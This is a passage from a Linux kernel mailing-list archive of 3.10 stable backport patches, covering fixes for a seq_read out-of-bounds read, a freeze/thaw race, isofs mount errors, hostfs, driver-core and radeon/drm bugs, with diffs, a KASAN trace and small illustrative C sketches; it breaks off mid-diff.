 				/*
 				 * Open state on this file cannot be recovered
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 173/319] fs/seq_file: fix out-of-bounds read
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (71 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 172/319] NFSv4: Open state recovery must account for file permission changes Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 174/319] fs/super.c: fix race between freeze_super() and thaw_super() Willy Tarreau
                   ` (145 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Vegard Nossum, Al Viro, Andrew Morton, Linus Torvalds, Willy Tarreau

From: Vegard Nossum <vegard.nossum@oracle.com>

commit 088bf2ff5d12e2e32ee52a4024fec26e582f44d3 upstream.

seq_read() is a nasty piece of work, not to mention buggy.

It has (I think) an old bug which allows unprivileged userspace to read
beyond the end of m->buf.

I was getting these:

    BUG: KASAN: slab-out-of-bounds in seq_read+0xcd2/0x1480 at addr ffff880116889880
    Read of size 2713 by task trinity-c2/1329
    CPU: 2 PID: 1329 Comm: trinity-c2 Not tainted 4.8.0-rc1+ #96
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014
    Call Trace:
      kasan_object_err+0x1c/0x80
      kasan_report_error+0x2cb/0x7e0
      kasan_report+0x4e/0x80
      check_memory_region+0x13e/0x1a0
      kasan_check_read+0x11/0x20
      seq_read+0xcd2/0x1480
      proc_reg_read+0x10b/0x260
      do_loop_readv_writev.part.5+0x140/0x2c0
      do_readv_writev+0x589/0x860
      vfs_readv+0x7b/0xd0
      do_readv+0xd8/0x2c0
      SyS_readv+0xb/0x10
      do_syscall_64+0x1b3/0x4b0
      entry_SYSCALL64_slow_path+0x25/0x25
    Object at ffff880116889100, in cache kmalloc-4096 size: 4096
    Allocated:
    PID = 1329
      save_stack_trace+0x26/0x80
      save_stack+0x46/0xd0
      kasan_kmalloc+0xad/0xe0
      __kmalloc+0x1aa/0x4a0
      seq_buf_alloc+0x35/0x40
      seq_read+0x7d8/0x1480
      proc_reg_read+0x10b/0x260
      do_loop_readv_writev.part.5+0x140/0x2c0
      do_readv_writev+0x589/0x860
      vfs_readv+0x7b/0xd0
      do_readv+0xd8/0x2c0
      SyS_readv+0xb/0x10
      do_syscall_64+0x1b3/0x4b0
      return_from_SYSCALL_64+0x0/0x6a
    Freed:
    PID = 0
    (stack is not available)
    Memory state around the buggy address:
     ffff88011688a000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
     ffff88011688a080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    >ffff88011688a100: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
		       ^
     ffff88011688a180: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
     ffff88011688a200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
    ==================================================================
    Disabling lock debugging due to kernel taint

This seems to be the same thing that Dave Jones was seeing here:

  https://lkml.org/lkml/2016/8/12/334

There are multiple issues here:

  1) If we enter the function with a non-empty buffer, there is an attempt
     to flush it. But it was not clearing m->from after doing so, which
     means that if we try to do this flush twice in a row without any call
     to traverse() in between, we are going to be reading from the wrong
     place -- the splat above, fixed by this patch.

  2) If there's a short write to userspace because of page faults, the
     buffer may already contain multiple lines (i.e. pos has advanced by
     more than 1), but we don't save the progress that was made so the
     next call will output what we've already returned previously. Since
     that is a much less serious issue (and I have a headache after
     staring at seq_read() for the past 8 hours), I'll leave that for now.
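
Issue 1) can be pictured with a small user-space model of the flush
bookkeeping. This is a simplified sketch, not the seq_file code: struct
seq_model, flush_model(), refill_model() and next_read_end() are
hypothetical, no data is actually copied, and refill_model() merely
assumes that new data lands at the start of the buffer without anything
resetting the from offset.

```c
#include <assert.h>
#include <stddef.h>

struct seq_model {
	size_t size;	/* capacity of the buffer */
	size_t from;	/* offset of the first unflushed byte */
	size_t count;	/* number of unflushed bytes */
};

/* Flush up to n bytes. clear_from selects the behaviour after the fix. */
static size_t flush_model(struct seq_model *m, size_t n, int clear_from)
{
	if (n > m->count)
		n = m->count;
	m->count -= n;
	m->from += n;
	if (!m->count && clear_from)
		m->from = 0;	/* buffer drained: next data starts at 0 */
	return n;
}

/* Assumed refill: new data at the start of the buffer, from untouched. */
static void refill_model(struct seq_model *m, size_t len)
{
	m->count = len;
}

/* One past the last buffer offset that the next flush would read. */
static size_t next_read_end(const struct seq_model *m)
{
	return m->from + m->count;
}
```

With a 4096-byte buffer, draining 3000 bytes and refilling 2000 leaves
the next flush ending at offset 5000 when from is stale, which is past
the end of the buffer; with from cleared it ends at 2000.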

Link: http://lkml.kernel.org/r/1471447270-32093-1-git-send-email-vegard.nossum@oracle.com
Signed-off-by: Vegard Nossum <vegard.nossum@oracle.com>
Reported-by: Dave Jones <davej@codemonkey.org.uk>
Cc: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/seq_file.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/fs/seq_file.c b/fs/seq_file.c
index 3dd44db..c009e60 100644
--- a/fs/seq_file.c
+++ b/fs/seq_file.c
@@ -206,8 +206,10 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos)
 		size -= n;
 		buf += n;
 		copied += n;
-		if (!m->count)
+		if (!m->count) {
+			m->from = 0;
 			m->index++;
+		}
 		if (!size)
 			goto Done;
 	}
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 174/319] fs/super.c: fix race between freeze_super() and thaw_super()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (72 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 173/319] fs/seq_file: fix out-of-bounds read Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 175/319] isofs: Do not return EACCES for unknown filesystems Willy Tarreau
                   ` (144 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Oleg Nesterov, Al Viro, Willy Tarreau

From: Oleg Nesterov <oleg@redhat.com>

commit 89f39af129382a40d7cd1f6914617282cfeee28e upstream.

Change thaw_super() to check frozen != SB_FREEZE_COMPLETE rather than
frozen == SB_UNFROZEN, otherwise it can race with freeze_super() which
drops sb->s_umount after SB_FREEZE_WRITE to preserve the lock ordering.

In this case thaw_super() will wrongly call s_op->unfreeze_fs() before
it was actually frozen, and call sb_freeze_unlock() which leads to the
unbalanced percpu_up_write(). Unfortunately lockdep can't detect this,
so this triggers misc BUG_ON()'s in kernel/rcu/sync.c.
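
The difference between the two checks shows up for the intermediate
freeze states. The sketch below is a user-space illustration only:
thaw_check_old() and thaw_check_new() are hypothetical helpers that
isolate the state test, the enum mirrors the kernel's state names with
numeric values chosen for illustration, and no locking is modelled.

```c
#include <assert.h>
#include <errno.h>

/* Freeze states, in the order freeze_super() walks through them. */
enum frozen_state {
	SB_UNFROZEN = 0,
	SB_FREEZE_WRITE = 1,
	SB_FREEZE_PAGEFAULT = 2,
	SB_FREEZE_FS = 3,
	SB_FREEZE_COMPLETE = 4,
};

/* Old test: only a fully unfrozen superblock is rejected. */
static int thaw_check_old(enum frozen_state frozen)
{
	return frozen == SB_UNFROZEN ? -EINVAL : 0;
}

/* New test: anything short of a completed freeze is rejected. */
static int thaw_check_new(enum frozen_state frozen)
{
	return frozen != SB_FREEZE_COMPLETE ? -EINVAL : 0;
}
```

A thaw that arrives while the state is still SB_FREEZE_WRITE passes the
old test and is refused by the new one.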

Reported-and-tested-by: Nikolay Borisov <kernel@kyup.com>
Signed-off-by: Oleg Nesterov <oleg@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/super.c | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/fs/super.c b/fs/super.c
index 97280e7..fd3281d 100644
--- a/fs/super.c
+++ b/fs/super.c
@@ -1327,8 +1327,8 @@ int freeze_super(struct super_block *sb)
 		}
 	}
 	/*
-	 * This is just for debugging purposes so that fs can warn if it
-	 * sees write activity when frozen is set to SB_FREEZE_COMPLETE.
+	 * For debugging purposes so that fs can warn if it sees write activity
+	 * when frozen is set to SB_FREEZE_COMPLETE, and for thaw_super().
 	 */
 	sb->s_writers.frozen = SB_FREEZE_COMPLETE;
 	up_write(&sb->s_umount);
@@ -1347,7 +1347,7 @@ int thaw_super(struct super_block *sb)
 	int error;
 
 	down_write(&sb->s_umount);
-	if (sb->s_writers.frozen == SB_UNFROZEN) {
+	if (sb->s_writers.frozen != SB_FREEZE_COMPLETE) {
 		up_write(&sb->s_umount);
 		return -EINVAL;
 	}
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 175/319] isofs: Do not return EACCES for unknown filesystems
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (73 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 174/319] fs/super.c: fix race between freeze_super() and thaw_super() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 176/319] hostfs: Freeing an ERR_PTR in hostfs_fill_sb_common() Willy Tarreau
                   ` (143 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Jan Kara, Willy Tarreau

From: Jan Kara <jack@suse.cz>

commit a2ed0b391dd9c3ef1d64c7c3e370f4a5ffcd324a upstream.

When isofs_mount() is called to mount a device read-write, it returns
EACCES even before it checks that the device actually contains an isofs
filesystem. This may confuse mount(8) which then tries to mount all
subsequent filesystem types in read-only mode.

Fix the problem by returning EACCES only once we verify that the device
indeed contains an iso9660 filesystem.
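
The effect of reordering the two checks can be shown with a toy model.
This is a sketch under assumptions, not isofs code: mount_old() and
mount_new() are hypothetical, the is_iso9660 flag replaces the real
superblock probing, and -EINVAL as the "not an iso9660 filesystem" result
is an assumption of the model.

```c
#include <assert.h>
#include <errno.h>

/* Old order: read-write mounts are refused before the device is probed. */
static int mount_old(int is_iso9660, int read_only)
{
	if (!read_only)
		return -EACCES;
	return is_iso9660 ? 0 : -EINVAL;
}

/* New order: probe first, refuse read-write only for a real iso9660 fs. */
static int mount_new(int is_iso9660, int read_only)
{
	if (!is_iso9660)
		return -EINVAL;
	if (!read_only)
		return -EACCES;
	return 0;
}
```

For a read-write mount of a device that holds some other filesystem, the
old order reports -EACCES while the new order reports the format error,
so the caller has no reason to fall back to read-only mode.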

Fixes: 17b7f7cf58926844e1dd40f5eb5348d481deca6a
Reported-by: Kent Overstreet <kent.overstreet@gmail.com>
Reported-by: Karel Zak <kzak@redhat.com>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/isofs/inode.c | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/fs/isofs/inode.c b/fs/isofs/inode.c
index 10489bb..955fabf 100644
--- a/fs/isofs/inode.c
+++ b/fs/isofs/inode.c
@@ -726,6 +726,11 @@ static int isofs_fill_super(struct super_block *s, void *data, int silent)
 	pri_bh = NULL;
 
 root_found:
+	/* We don't support read-write mounts */
+	if (!(s->s_flags & MS_RDONLY)) {
+		error = -EACCES;
+		goto out_freebh;
+	}
 
 	if (joliet_level && (pri == NULL || !opt.rock)) {
 		/* This is the case of Joliet with the norock mount flag.
@@ -1538,9 +1543,6 @@ struct inode *__isofs_iget(struct super_block *sb,
 static struct dentry *isofs_mount(struct file_system_type *fs_type,
 	int flags, const char *dev_name, void *data)
 {
-	/* We don't support read-write mounts */
-	if (!(flags & MS_RDONLY))
-		return ERR_PTR(-EACCES);
 	return mount_bdev(fs_type, flags, dev_name, data, isofs_fill_super);
 }
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 176/319] hostfs: Freeing an ERR_PTR in hostfs_fill_sb_common()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (74 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 175/319] isofs: Do not return EACCES for unknown filesystems Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 177/319] driver core: Delete an unnecessary check before the function call "put_device" Willy Tarreau
                   ` (142 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Dan Carpenter, Richard Weinberger, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit 8a545f185145e3c09348cd74326268ecfc6715a3 upstream.

We can't pass error pointers to kfree() or it causes an oops.
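
For readers unfamiliar with error pointers, here is a user-space sketch
of the idea and of the corrected control flow. It is an emulation under
assumptions, not kernel code: err_ptr(), ptr_err() and is_err() imitate
the kernel helpers, lookup_model() is a hypothetical stand-in for
follow_link(), free() stands in for kfree(), and long is assumed to be as
wide as a pointer, as it is on Linux.

```c
#include <assert.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>

#define MAX_ERRNO 4095	/* error codes occupy the top 4095 addresses */

static void *err_ptr(long error)
{
	return (void *)error;
}

static long ptr_err(const void *ptr)
{
	return (long)ptr;
}

static int is_err(const void *ptr)
{
	return (unsigned long)ptr >= (unsigned long)-MAX_ERRNO;
}

/* Hypothetical lookup: returns a heap string or an encoded error. */
static char *lookup_model(int fail)
{
	char *name;

	if (fail)
		return err_ptr(-ENOENT);
	name = malloc(8);
	if (!name)
		return err_ptr(-ENOMEM);
	strcpy(name, "target");
	return name;
}

/* Fixed flow: bail out before the free when the pointer encodes an error. */
static int use_name_model(int fail)
{
	char *name = lookup_model(fail);

	if (is_err(name))
		return (int)ptr_err(name);	/* never handed to free() */
	free(name);
	return 0;
}
```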

Fixes: 52b209f7b848 ('get rid of hostfs_read_inode()')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/hostfs/hostfs_kern.c | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/fs/hostfs/hostfs_kern.c b/fs/hostfs/hostfs_kern.c
index b58a9cb..f0faa87 100644
--- a/fs/hostfs/hostfs_kern.c
+++ b/fs/hostfs/hostfs_kern.c
@@ -942,10 +942,11 @@ static int hostfs_fill_sb_common(struct super_block *sb, void *d, int silent)
 
 	if (S_ISLNK(root_inode->i_mode)) {
 		char *name = follow_link(host_root_path);
-		if (IS_ERR(name))
+		if (IS_ERR(name)) {
 			err = PTR_ERR(name);
-		else
-			err = read_name(root_inode, name);
+			goto out_put;
+		}
+		err = read_name(root_inode, name);
 		kfree(name);
 		if (err)
 			goto out_put;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 177/319] driver core: Delete an unnecessary check before the function call "put_device"
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (75 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 176/319] hostfs: Freeing an ERR_PTR in hostfs_fill_sb_common() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 178/319] driver core: fix race between creating/querying glue dir and its cleanup Willy Tarreau
                   ` (141 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Markus Elfring, Greg Kroah-Hartman, Willy Tarreau

From: Markus Elfring <elfring@users.sourceforge.net>

commit 5f0163a5ee9cc7c59751768bdfd94a73186debba upstream.

The put_device() function tests whether its argument is NULL and then
returns immediately. Thus the test around the call is not needed.

This issue was detected by using the Coccinelle software.

Signed-off-by: Markus Elfring <elfring@users.sourceforge.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[wt: backported only to ease next patch as suggested by Jiri]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/base/core.c | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/drivers/base/core.c b/drivers/base/core.c
index 2a19097..d92ecf3 100644
--- a/drivers/base/core.c
+++ b/drivers/base/core.c
@@ -1138,8 +1138,7 @@ done:
 	kobject_del(&dev->kobj);
  Error:
 	cleanup_device_parent(dev);
-	if (parent)
-		put_device(parent);
+	put_device(parent);
 name_error:
 	kfree(dev->p);
 	dev->p = NULL;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 178/319] driver core: fix race between creating/querying glue dir and its cleanup
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (76 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 177/319] driver core: Delete an unnecessary check before the function call "put_device" Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 179/319] drm/radeon: fix radeon_move_blit on 32bit systems Willy Tarreau
                   ` (140 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Ming Lei, Yijing Wang, Greg Kroah-Hartman, Willy Tarreau

From: Ming Lei <ming.lei@canonical.com>

commit cebf8fd16900fdfd58c0028617944f808f97fe50 upstream.

The global mutex 'gdp_mutex' is used to serialize creating/querying the
glue dir and its cleanup. It turns out this is not sufficient, because
part of the actual cleanup (kobj_kset_leave()) is done inside the
release handler of the glue dir kobject. That means gdp_mutex has to be
held before releasing the last reference count of the glue dir kobject.

This patch moves the glue dir's cleanup after kobject_del() in
device_del() to avoid the race.

Cc: Yijing Wang <wangyijing@huawei.com>
Reported-by: Chandra Sekhar Lingutla <clingutla@codeaurora.org>
Signed-off-by: Ming Lei <ming.lei@canonical.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/base/core.c | 39 +++++++++++++++++++++++++++++----------
 1 file changed, 29 insertions(+), 10 deletions(-)

diff --git a/drivers/base/core.c b/drivers/base/core.c
index d92ecf3..986fc4e 100644
--- a/drivers/base/core.c
+++ b/drivers/base/core.c
@@ -827,11 +827,29 @@ static struct kobject *get_device_parent(struct device *dev,
 	return NULL;
 }
 
+static inline bool live_in_glue_dir(struct kobject *kobj,
+				    struct device *dev)
+{
+	if (!kobj || !dev->class ||
+	    kobj->kset != &dev->class->p->glue_dirs)
+		return false;
+	return true;
+}
+
+static inline struct kobject *get_glue_dir(struct device *dev)
+{
+	return dev->kobj.parent;
+}
+
+/*
+ * make sure cleaning up dir as the last step, we need to make
+ * sure .release handler of kobject is run with holding the
+ * global lock
+ */
 static void cleanup_glue_dir(struct device *dev, struct kobject *glue_dir)
 {
 	/* see if we live in a "glue" directory */
-	if (!glue_dir || !dev->class ||
-	    glue_dir->kset != &dev->class->p->glue_dirs)
+	if (!live_in_glue_dir(glue_dir, dev))
 		return;
 
 	mutex_lock(&gdp_mutex);
@@ -839,11 +857,6 @@ static void cleanup_glue_dir(struct device *dev, struct kobject *glue_dir)
 	mutex_unlock(&gdp_mutex);
 }
 
-static void cleanup_device_parent(struct device *dev)
-{
-	cleanup_glue_dir(dev, dev->kobj.parent);
-}
-
 static int device_add_class_symlinks(struct device *dev)
 {
 	int error;
@@ -1007,6 +1020,7 @@ int device_add(struct device *dev)
 	struct kobject *kobj;
 	struct class_interface *class_intf;
 	int error = -EINVAL;
+	struct kobject *glue_dir = NULL;
 
 	dev = get_device(dev);
 	if (!dev)
@@ -1051,8 +1065,10 @@ int device_add(struct device *dev)
 	/* first, register with generic layer. */
 	/* we require the name to be set before, and pass NULL */
 	error = kobject_add(&dev->kobj, dev->kobj.parent, NULL);
-	if (error)
+	if (error) {
+		glue_dir = get_glue_dir(dev);
 		goto Error;
+	}
 
 	/* notify platform of device entry */
 	if (platform_notify)
@@ -1135,9 +1151,10 @@ done:
 	device_remove_file(dev, &uevent_attr);
  attrError:
 	kobject_uevent(&dev->kobj, KOBJ_REMOVE);
+	glue_dir = get_glue_dir(dev);
 	kobject_del(&dev->kobj);
  Error:
-	cleanup_device_parent(dev);
+	cleanup_glue_dir(dev, glue_dir);
 	put_device(parent);
 name_error:
 	kfree(dev->p);
@@ -1209,6 +1226,7 @@ void put_device(struct device *dev)
 void device_del(struct device *dev)
 {
 	struct device *parent = dev->parent;
+	struct kobject *glue_dir = NULL;
 	struct class_interface *class_intf;
 
 	/* Notify clients of device removal.  This call must come
@@ -1250,8 +1268,9 @@ void device_del(struct device *dev)
 	if (platform_notify_remove)
 		platform_notify_remove(dev);
 	kobject_uevent(&dev->kobj, KOBJ_REMOVE);
-	cleanup_device_parent(dev);
+	glue_dir = get_glue_dir(dev);
 	kobject_del(&dev->kobj);
+	cleanup_glue_dir(dev, glue_dir);
 	put_device(parent);
 }
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 179/319] drm/radeon: fix radeon_move_blit on 32bit systems
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (77 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 178/319] driver core: fix race between creating/querying glue dir and its cleanup Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 180/319] drm: Reject page_flip for !DRIVER_MODESET Willy Tarreau
                   ` (139 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Christian König, Alex Deucher, Willy Tarreau

From: Christian König <christian.koenig@amd.com>

commit 13f479b9df4e2bbf2d16e7e1b02f3f55f70e2455 upstream.

This bug seems to have been present for a very long time.
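
A small sketch of the effect the (u64) cast in the diff guards against,
assuming 4 KiB pages. Here uint32_t stands in for a 32-bit unsigned long
page number; the function names are made up for this illustration and are
not part of the radeon driver.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SHIFT 12	/* assumed 4 KiB pages */

/* Shift performed in 32 bits: the high bits are lost before widening. */
static uint64_t offset_truncated(uint32_t start_page)
{
	return (uint32_t)(start_page << PAGE_SHIFT);
}

/* Widen first, then shift: the full byte offset is preserved. */
static uint64_t offset_widened(uint32_t start_page)
{
	return (uint64_t)start_page << PAGE_SHIFT;
}
```

For a buffer starting at page 0x100000 (byte offset 4 GiB), the first
variant wraps to 0 while the second yields 0x100000000.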

Signed-off-by: Christian König <christian.koenig@amd.com>
Reviewed-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/gpu/drm/radeon/radeon_ttm.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/gpu/drm/radeon/radeon_ttm.c b/drivers/gpu/drm/radeon/radeon_ttm.c
index f701559..6c92c20 100644
--- a/drivers/gpu/drm/radeon/radeon_ttm.c
+++ b/drivers/gpu/drm/radeon/radeon_ttm.c
@@ -228,8 +228,8 @@ static int radeon_move_blit(struct ttm_buffer_object *bo,
 
 	rdev = radeon_get_rdev(bo->bdev);
 	ridx = radeon_copy_ring_index(rdev);
-	old_start = old_mem->start << PAGE_SHIFT;
-	new_start = new_mem->start << PAGE_SHIFT;
+	old_start = (u64)old_mem->start << PAGE_SHIFT;
+	new_start = (u64)new_mem->start << PAGE_SHIFT;
 
 	switch (old_mem->mem_type) {
 	case TTM_PL_VRAM:
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 180/319] drm: Reject page_flip for !DRIVER_MODESET
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (78 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 179/319] drm/radeon: fix radeon_move_blit on 32bit systems Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 181/319] drm/radeon: Ensure vblank interrupt is enabled on DPMS transition to on Willy Tarreau
                   ` (138 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Daniel Vetter, Alexander Potapenko, Daniel Vetter, Dave Airlie,
	Willy Tarreau

From: Daniel Vetter <daniel.vetter@ffwll.ch>

commit 6f00975c619064a18c23fd3aced325ae165a73b9 upstream.

Somehow this one slipped through, which means drivers without modeset
support can be oopsed (since those also don't call
drm_mode_config_init, which means the crtc lookup will chase an
uninitialized idr).

Reported-by: Alexander Potapenko <glider@google.com>
Cc: Alexander Potapenko <glider@google.com>
Signed-off-by: Daniel Vetter <daniel.vetter@intel.com>
Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
Signed-off-by: Dave Airlie <airlied@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/gpu/drm/drm_crtc.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/gpu/drm/drm_crtc.c b/drivers/gpu/drm/drm_crtc.c
index c24c356..121680f 100644
--- a/drivers/gpu/drm/drm_crtc.c
+++ b/drivers/gpu/drm/drm_crtc.c
@@ -3422,6 +3422,9 @@ int drm_mode_page_flip_ioctl(struct drm_device *dev,
 	int hdisplay, vdisplay;
 	int ret = -EINVAL;
 
+	if (!drm_core_check_feature(dev, DRIVER_MODESET))
+		return -EINVAL;
+
 	if (page_flip->flags & ~DRM_MODE_PAGE_FLIP_FLAGS ||
 	    page_flip->reserved != 0)
 		return -EINVAL;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 181/319] drm/radeon: Ensure vblank interrupt is enabled on DPMS transition to on
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (79 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 180/319] drm: Reject page_flip for !DRIVER_MODESET Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 182/319] qxl: check for kmap failures Willy Tarreau
                   ` (137 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Michel Dänzer, Michel Dänzer, Willy Tarreau

From: Michel Dänzer <michel@daenzer.net>

NOTE: This patch only applies to 4.5.y or older kernels. With newer
kernels, this problem cannot happen because the driver now uses
drm_crtc_vblank_on/off instead of drm_vblank_pre/post_modeset[0]. I
consider this patch safer for older kernels than backporting the API
change, because drm_crtc_vblank_on/off had various issues in older
kernels, and I'm not sure all fixes for those have been backported to
all stable branches where this patch could be applied.

    ---------------------

Fixes the vblank interrupt being disabled when it should be on, which
can cause at least the following symptoms:

* Hangs when running 'xset dpms force off' in a GNOME session with
  gnome-shell using DRI2.
* RandR 1.4 slave outputs freezing with garbage displayed using
  xf86-video-ati 7.8.0 or newer.

[0] See upstream commit:

commit 777e3cbc791f131806d9bf24b3325637c7fc228d
Author: Daniel Vetter <daniel.vetter@ffwll.ch>
Date:   Thu Jan 21 11:08:57 2016 +0100

    drm/radeon: Switch to drm_vblank_on/off

Reported-and-Tested-by: Max Staudt <mstaudt@suse.de>
Reviewed-by: Daniel Vetter <daniel@ffwll.ch>
Reviewed-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Michel Dänzer <michel.daenzer@amd.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/gpu/drm/radeon/atombios_crtc.c      | 2 ++
 drivers/gpu/drm/radeon/radeon_legacy_crtc.c | 2 ++
 2 files changed, 4 insertions(+)

diff --git a/drivers/gpu/drm/radeon/atombios_crtc.c b/drivers/gpu/drm/radeon/atombios_crtc.c
index 8ac3330..4d09582 100644
--- a/drivers/gpu/drm/radeon/atombios_crtc.c
+++ b/drivers/gpu/drm/radeon/atombios_crtc.c
@@ -257,6 +257,8 @@ void atombios_crtc_dpms(struct drm_crtc *crtc, int mode)
 			atombios_enable_crtc_memreq(crtc, ATOM_ENABLE);
 		atombios_blank_crtc(crtc, ATOM_DISABLE);
 		drm_vblank_post_modeset(dev, radeon_crtc->crtc_id);
+		/* Make sure vblank interrupt is still enabled if needed */
+		radeon_irq_set(rdev);
 		radeon_crtc_load_lut(crtc);
 		break;
 	case DRM_MODE_DPMS_STANDBY:
diff --git a/drivers/gpu/drm/radeon/radeon_legacy_crtc.c b/drivers/gpu/drm/radeon/radeon_legacy_crtc.c
index bc73021..ae0d7b1 100644
